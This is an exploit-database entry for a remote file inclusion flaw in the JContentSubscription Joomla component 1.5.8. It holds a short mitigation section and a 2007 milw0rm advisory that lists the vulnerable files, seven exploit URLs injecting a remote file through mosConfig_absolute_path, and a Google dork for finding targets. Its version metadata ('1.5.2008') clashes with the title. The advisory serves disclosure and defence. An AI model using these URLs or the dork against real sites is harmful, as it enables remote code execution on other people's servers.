JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

vendor:

Joomla Component

by:

NoGe

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: Joomla Component

Affected Version From: 1.5.2008

Affected Version To: 1.5.2008

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

The JContentSubscription Joomla component version 1.5.8 is vulnerable to multiple remote file inclusion vulnerabilities. These vulnerabilities allow an attacker to include arbitrary remote files by manipulating the 'mosConfig_absolute_path' parameter in various files. By exploiting these vulnerabilities, an attacker can execute malicious code on the affected system.

Mitigation:

To mitigate these vulnerabilities, it is recommended to update the JContentSubscription component to the latest version available. Additionally, it is advised to restrict access to the affected files and directories, and to regularly monitor for any unauthorized access or modifications.

Source

Exploit-DB raw data:

# JContentSubscription Joomla Component 1.5.8 Multiply Remote File Include Vulnerability

   Component    : com_jcs version 1.5.8 - payable component
   Dicovered by : NoGe
   Contact      : pace.noge@hotmail.com

==================================================================================================================================

# Vulnerable file

   /administrator/components/com_jcs/jcs.function.php

   line 6 require_once( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/add.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/history.php

   line 7 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/view/register.php

   line 6 require( $mosConfig_absolute_path.'/components/com_jcs/languages/english.php' );

   /administrator/components/com_jcs/views/list.sub.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/list.user.sub.html.php

   line 7 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

   /administrator/components/com_jcs/views/reports.html.php

   line 3 require_once( $mosConfig_absolute_path ."/administrator/components/com_jcs/menubar.php" );

# Exploit

   http://localhost/path/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/add.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/history.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
   http://localhost/path/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=[evilcode]

# Google dork

   inurl:com_jcs

==================================================================================================================================

# Greetz

   all crew #papuahacker #baliemhackerlink #nyubicrew
   skulmatic olibekas ulga Cungkee nyubi k1tk4t newbie str0ke
   yooogy H312Y Vaksin13 Oon_Boy Paman mousekill }^-^{ haliq
   http://kapukvalley.net member

================================================================================================================================== 

# milw0rm.com [2007-10-10]